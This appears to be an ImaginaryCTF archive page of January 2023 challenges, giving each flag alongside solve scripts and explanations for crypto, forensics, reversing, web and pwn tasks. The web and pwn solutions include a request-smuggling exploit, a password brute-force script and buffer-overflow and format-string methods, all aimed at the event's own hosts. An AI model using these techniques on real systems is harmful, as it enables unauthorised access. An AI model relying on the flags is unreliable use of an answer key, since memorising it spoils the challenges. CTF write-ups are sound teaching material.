Archived Challenges - January 2023

A new year and a nice, even, number.

ictf{H@ppy_New_Ye@r!_Round_30}

echo aWN0ZntfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX30= | base64 -d

ictf{___________________________________}

Translate the audio from wave to text using some tool that facilitates that like SoundRecognizer in python and then convert the text from words to binary, then the binary to ASCII. https://imaginaryctf.org/f/ViMyZ

ictf{one_or_zero_idk_934ac3}

from PIL import Image

combine = lambda a,b: (a[0]+b[0], a[1]+b[1])

im = Image.open("flag.png")

x, y = 0, 0
flag = ''

while '}' not in flag:
    deltas = [(0,0), (0, 1), (1,0), (1, 1)]
    data = 0
    for i in range(4):
        px_loc = combine((x, y), deltas[i])
        px = im.getpixel(px_loc)
        for val in px[:-1]:
            data += val&3
            data <<= 2
    data >>= 2
    char = data >> 16
    x = (data >> 8)&0xff
    y = data & 0xff
    flag += chr(char)
    print(flag)

The provided program stores data in 2x2 pixel chunks in the image, in the lower 2 bits of each of the R, G, and B values. These 24 bits encode a character of the flag, and the x and y value of the next pixel chunk, meaning you can traverse these and get the flag.

ictf{jumping_all_over_the_pl@ce}

ct = b'~y,~5/$&1})4!:,>%>-(.::SB.ED727_`T'
alphabet = bytes(range(32, 127))

for key in range(95):
    print(bytes(alphabet[(c-key-i)%len(alphabet)] for i,c in enumerate(ct)))

This is a standard caesar cipher, but the key increases by 1 for each letter. Brute forcing all 95 keys yields the flag.

ictf{this_is_why_we_don't_use_c++}

Don't reuse the nonce, pals. It's written in the name. https://imaginaryctf.org/f/s3OwX

ictf{4_n0nc3_5h0u!d_0n!y_b3_u53d_0NC3!!!}

p=x^2+1 and q=x^2+1 so isqrt(n,2) is a good approximation of x*y, then you get phi(n)=x^2*y^2 so you can compute d to decrypt the flag.

from Crypto.Util.number import long_to_bytes
import gmpy2

with open('output.txt') as f:
    exec(f.read())

xy = gmpy2.iroot(n, 2)[0] - 1
phi = xy**2
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))

ictf{just_some_easy_math}

The server file makes no validation on the input point: this is the textbook case of an invalid curve attack. Solve script at https://imaginaryctf.org/f/CzUoU.

ictf{1nv4L1d_cURv3,_v4L1D_fL4g!}

DSA with known high bits of the nonce. What could have gone wrong? https://imaginaryctf.org/f/1ND6B

ictf{W34k_n0nc3,_345y_ch4LLL}

The nonces are related by an algebraic relation. Gröbner destroys the chall. https://imaginaryctf.org/f/9CgVl

ictf{P!3453_53r10u5!y_570p_u51ng_57r4ng3_w4y5_70_g3n3r473_n0nc35}

https://imaginaryctf.org/f/T2IV6#sol.py

The cipher is completely linear, and is not doing any permutation on bits, only bytes. So you can send a plaintext of null bytes to recover the otp key, then send pretty much whatever to see how the permutation works (you can do that just by reversing the code, but it's less work this way).

ictf{S0_much_w0rk_f0r_an_0tp_and_s0m3_p3rmutat10n...}

You can get 3 linear equations modulo q by eliminating d from ECDSA equations, and you can get another 3 linear equations modulo p using the LCG relations. Build a lattice with these 6 equations being columns then use LLL to find k and recover d.

https://imaginaryctf.org/f/VnT0f#solve.py

ictf{those_youtube_links_are_what_I_am_listening_when_writing_this_challenge}

First you need to open devtool and stop the anti debugging debugger statement then disable that annoying animation. Some elements are hidden by ads-banner, so you need to disable adblockers to actually see it. The flag is also splited into multiple span elements and zwnj, so you need to remove them to find the flag.

document.body.textContent.replaceAll('\u200c','').match(/iiccttff{.*?}/)[0]

Script source: https://imaginaryctf.org/f/xRZpV

ictf{a_challenge_to_troll_people_using_adblockers_:rooDevil:}

curl --cookie access_password=4114aba04c226113720301d5fdc50c48 http://puzzler7.imaginaryctf.org:9002/9b59ead05f0402265e06df51771055f3

The website cookie-bombs you immediately upon visiting it, preventing you from accessing the flag page. However, clearing your cookies also deletes the access_password cookie that lets you access the flag. Curling the flag page with the appropriate cookie yields the flag.

ictf{don't_byte_off_more_than_you_can_chew!}

Content-Length is the message length in str, but it should be bytes, so we can smuggle an extra request using unicode characters. To force it be handled correctly in gunicorn you need to align the request to chunk_size.

import requests
from app import build_http, API_HOST, API_PORT

bare = build_http(API_HOST, API_PORT, "POST", "/echo", "")
req = """FLAG_PLEASE /flag HTTP/1.1\r
Host: localhost:7777\r
\r
"""
req = req.ljust((1024 - len(bare) - 3) // 2, " ")
msg = "aa" + "À" * len(req) + req
print(msg.encode()[len(msg) :])
rq = build_http(API_HOST, API_PORT, "POST", "/echo", msg)
print(rq[:1024])
print(rq[1024:])

r = requests.post("http://ictf.maple3142.net:8888/echo", data={"msg": msg})
print(r.text)

ictf{how_did_you_managed_to_echo_my_flag?!}

from requests import post
from itertools import permutations

url = 'http://puzzler7.imaginaryctf.org:9004/apps/password-protect/authenticate'

json_data = {"page_id":"61216424102","article_id":"","product_id":"","collection_ids":"","version":"2","password":"aaaa"}

colors = ['yellow', 'blue', 'orange', 'green', 'red', 'pink']

reqs = 0

for combo in permutations(colors):
    resp = post(url, json={**json_data, "password": ''.join(combo)})
    reqs += 1
    if resp.status_code == 200:
        print(''.join(combo))
        print(reqs, "requests made")
        break
    if reqs % 5 == 0:
        print(reqs, ''.join(combo))

# Password: redpinkorangegreenblueyellow

There are only 720 possible passwords, so you can just brute force through them. The server checks the password by making a post request, and checking if the response code is 200.

ictf{redpinkorangegreenblueyellow}

The captcha answer is saved in the flask session cookie. Decoding the flask cookie gets the captcha answer. https://imaginaryctf.org/f/YOFUI

ictf{what_do_you_mean_this_isn't_realistic?_11452}

So those binary numbers can actually be converted to an image file using https://www.dcode.fr/binary-image. The name and the description gives hints regarding this. You'll have to scroll down to the last image to be able to read the flag correctly.

Alternately, you can chuck the binary into your favorite text processor, and set the font size to be very very small, like this: https://imaginaryctf.org/f/MxKSX

ictf{y0u'r3_4_m34n_0n3_Mr._b1n4ry}

https://imaginaryctf.org/f/9gM80#x.py https://en.wikipedia.org/wiki/Arnold%27s_cat_map

Arnold's cat eventually loops back to itself, so you can generate the next 300 images and scan for the flag.

Alt challenge title - Just Cat The Flag

ictf{i'll_be_back_6dd49165}

ct = open("flag.protobuf", 'rb').read()

fake = {}
real = {}

while len(ct) > 0:
    chunk = ct[:6]
    ct = ct[6:]
    idx = chunk[3]
    char = chr(chunk[5])
    fake[idx] = char
    if idx not in real:
        real[idx] = char

print(''.join(fake[i] for i in range(len(fake))))
print(''.join(real[i] for i in range(len(real))))

The provided message is a map from int to character, mapping each character to its position in the flag. However, protobuf maps overwrite a value received twice. In the provided message, the real flag is overwritten with the fake flag - taking the first value for each index yields the real flag.

ictf{green_flags_&_true_flags_form_an_equivalence_class}

https://imaginaryctf.org/f/Zcool

ictf{cYcl3_CycLE_CYc|3_cYCL3_cYcl3_CycLE_CYc|3_cYCL3_cYcl3_CycLE_CYc|3_cYCL3}

Take a look at the binary and see that it's .NET and use a tool to examine the contents to see that it's using a conspicuous integer 2654435769u and if you google it you will see that it is the Tiny Encryption Algorithm or TEA. Write your own or find an online version of this algo, use the key from the binary, and decrypt the flag. https://imaginaryctf.org/f/em65F

ictf{i_hope_you_didn't_rev_the_whole_algo_8309a}

https://imaginaryctf.org/f/rx9SM#x.py

As the code states, this is just a wavelet tree, and you can recursively reconstruct the original string. See https://en.wikipedia.org/wiki/Wavelet_Tree and https://www.alexbowe.com/wavelet-trees/ for more information on wavelet trees.

ictf{this_is_m3_g3neratinggg_@_long_and_suff1ciently_complicated_flag_for_+he_purpose5_of_mak!ng_this_more_complic@ted}

Either reverse the vm instructions to see what the program in bin is doing, then manually decrypt, or step through with a debugger until you find the flag in memory. The flag gets encrypted again, so you need to break after the first loop.

Manual flag decryption:

f = open("bin", "rb").read()

flag = [0]

for ff in f[0x45:]:
    flag.append(flag[-1] ^ ff)

print(bytes(flag)[73:])

ictf{H0w_m4ny_us3l355_funct10n5_d1d_y0u_l00k_4t?}

https://imaginaryctf.org/f/c3e0v#x.py

The flag starts with ictf{ and ends with }, meaning that there are 48 known bits in the initial state. Every timestep, each bit gets the value of the xor of its neighbors, wrapping around the ends of the flag. Because it wraps, we can treat this the known bits as one 48 bit chunk. Each timestep, 2 bits of the initial state are lost, one off of either end. However, the provided script only iterates 20 times before giving us information, meaning that we know some bits at the previous timestep, which we can use to fully recover the previous timestep. This can be repeated until we find the flag.

ictf{+Im3Tr@V31}

The password is before the username in a struct, and both reading the username and the password have a trivial buffer overflow. Thus, we can simply overflow the password to write admin to the username by sending any 64 characters followed by admin as the password.

ictf{how_long_has_it_been_since_weve_done_just_a_simple_buffer_overfl0w?}

The provided file is both an ELF and a ZIP file, and you can get the perl source by unzipping it. You then figure out it is using sprintf() and there's is a format string vulnerability. You can just use %s to get the flag!

ictf{f0rm4t_s7r1ng_1n_p3rl_ftw_78435d}

The structs for each user are all malloc'd at the beginning of the program, and as a result are all right next to each other. Creating a user with a long enough password overflows into the username field of the next user. Thus, you can make an admin account by entering any 80 characters then admin as the password. Accounts have empty username/password by default, allowing you to log in with admin and an empty password to get the flag.

ictf{some_good_old_structured_fun_deb56536}

ct = open('flag.protobuf', 'rb').read()

start = ct[:86*8*3]
end = ct[86*8*3:]

valid_bytes = start[::3] + end[::2]

bits = ''.join([str(1*(i == 0x12)) for i in valid_bytes])
while len(bits) > 0:
    char = bits[:8]
    bits = bits[8:]
    print(chr(int(char,2)), end='')

Checking a protobuf decoder like https://protogen.marcgravell.com/decode, you can see that this is a deeply nested message, which alternates between using fields 1 and 2. Parsing the first few bits into ASCII quickly confirms that this is binary. These fields correspond to the bytes \x0a and \x12, respectively, and the important bytes occur 3 bytes apart for most of the file, and 2 bytes apart towards the end.

ictf{this_is_some_cool_technology_that_I'm_going_to_spend_entirely_too_much_time_working_with}